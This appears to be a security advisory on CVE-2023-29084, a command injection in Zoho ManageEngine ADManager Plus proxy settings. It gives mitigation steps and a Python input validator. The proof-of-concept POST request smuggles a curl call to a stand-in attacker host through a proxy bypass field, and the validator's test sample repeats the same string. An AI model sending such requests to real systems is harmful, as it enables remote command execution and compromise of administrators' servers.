Security researchers have discovered a critical command injection vulnerability (CVE-2023-29084) in Zoho ManageEngine ADManager Plus versions up to and including 718. Zoho ManageEngine ADManager Plus is a popular Active Directory management and reporting solution for IT administrators.

If successfully exploited, this vulnerability allows authenticated users to execute arbitrary commands on the targeted application remotely via the Proxy settings, which can lead to a compromise of the entire system. In this post, we discuss the details of the vulnerability, the affected component, and the steps administrators should take to protect their systems.

Affected Component

The vulnerability exists in the Proxy settings component of Zoho ManageEngine ADManager Plus. The Proxy settings allow administrators to route connections to external services such as SMTP, HTTP(S) and FTP through a proxy server.

Exploit Details

This issue stems from insufficient validation of user-supplied input in the Proxy settings, which makes command injection possible. An attacker can tamper with the Proxy settings to inject commands, which are then executed with the privileges of the application when the settings are enabled or when an external service is invoked.

An attacker could gain access to sensitive data or take complete control of the targeted system. Given the severity of this vulnerability, system administrators should apply the necessary patches or workarounds immediately.

A simplified proof-of-concept request for exploiting this vulnerability is as follows:

POST /ProxySettings HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length

proxyEnable=True&proxyHostValid=;&proxyPortValid=;&proxyUsernameValid=;&proxyPasswordValid=;&testConnection=false&noConnections=&proxyType=&proxyHost=attacker.example.com&proxyPort=80&proxyServerNoHosts=127...1,curl%20http://attacker.example.com/execute-command.cgi|&proxyUsername=admin&proxyPassword=admin

This request demonstrates how an attacker could exploit the vulnerability to execute an arbitrary command, in this case a curl command that downloads and runs a script hosted on the attacker's server.
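The root cause described above is that the Proxy settings fields reach a command without being validated. As an added example (not code from the advisory, from Zoho, or from ADManager Plus), the validator below accepts only hostnames, IP addresses and port numbers for the proxy fields and rejects the bypass list in the request above; the field names follow that request, while the rules and the sample bodies are assumptions about what a server-side fix should enforce.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123-style hostname labels: letters, digits and hyphens joined by dots.
# Shell metacharacters (';', '|', spaces), URL schemes and empty labels all fail.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def is_valid_host(value: str) -> bool:
    """Accept a hostname or a literal IPv4/IPv6 address, nothing else."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(value) is not None


def is_valid_port(value: str) -> bool:
    """Accept only a decimal integer in the TCP/UDP port range."""
    return value.isdigit() and 1 <= int(value) <= 65535


def validate_proxy_settings(form_body: str) -> dict[str, str]:
    """Map each rejected form field to an error; an empty dict means safe to persist."""
    fields = parse_qs(form_body, keep_blank_values=True)

    def get(name: str) -> str:
        return fields.get(name, [""])[0]

    errors: dict[str, str] = {}
    if get("proxyEnable").lower() not in ("true", "false"):
        errors["proxyEnable"] = "must be true or false"
    if not is_valid_host(get("proxyHost")):
        errors["proxyHost"] = "not a hostname or IP address"
    if not is_valid_port(get("proxyPort")):
        errors["proxyPort"] = "not an integer in 1-65535"
    # The bypass list is comma-separated; every entry must stand alone as a host.
    for entry in filter(None, (e.strip() for e in get("proxyServerNoHosts").split(","))):
        if not is_valid_host(entry):
            errors["proxyServerNoHosts"] = f"rejected entry {entry!r}"
            break
    return errors


# Constructed sample bodies: one benign, one shaped like the request in the advisory.
CLEAN_BODY = "proxyEnable=True&proxyHost=proxy.corp.example&proxyPort=3128&proxyServerNoHosts=127.0.0.1,intranet.corp.example"
INJECTION_BODY = "proxyEnable=True&proxyHost=attacker.example.com&proxyPort=80&proxyServerNoHosts=127...1,curl%20http://attacker.example.com/execute-command.cgi|"
```

Validation alone is only half of the fix: the settings must also be handed to the network layer as data (for example as separate arguments), never concatenated into a shell command line.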

Original References

1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29084
2. https://www.manageengine.com/products/ad-manager/download.html
3. https://cloud.zoho.com/portal/manageengine/security.do

To protect against this vulnerability, administrators should take the following steps:

1. Update to the latest version of Zoho ManageEngine ADManager Plus: The issue has been fixed in version 7181 and later. Zoho strongly recommends upgrading to the latest version to avoid potential exploits. Download the updated version from the official website.

2. Apply security patches and updates: Keep your systems updated with the latest security patches to protect against known vulnerabilities. Regularly check the Zoho Security Portal for the latest security advisories and updates.

Conclusion

CVE-2023-29084 is a critical command injection vulnerability in Zoho ManageEngine ADManager Plus up to version 718. The vulnerability affects the Proxy settings component of the application, and if left unpatched, it allows attackers to execute arbitrary commands on the target system. It is of utmost importance that administrators update their systems to the latest version and apply security patches and updates as soon as they become available.

Timeline

Published on: 04/13/2023 19:15:00 UTC
Last modified on: 04/21/2023 13:19:00 UTC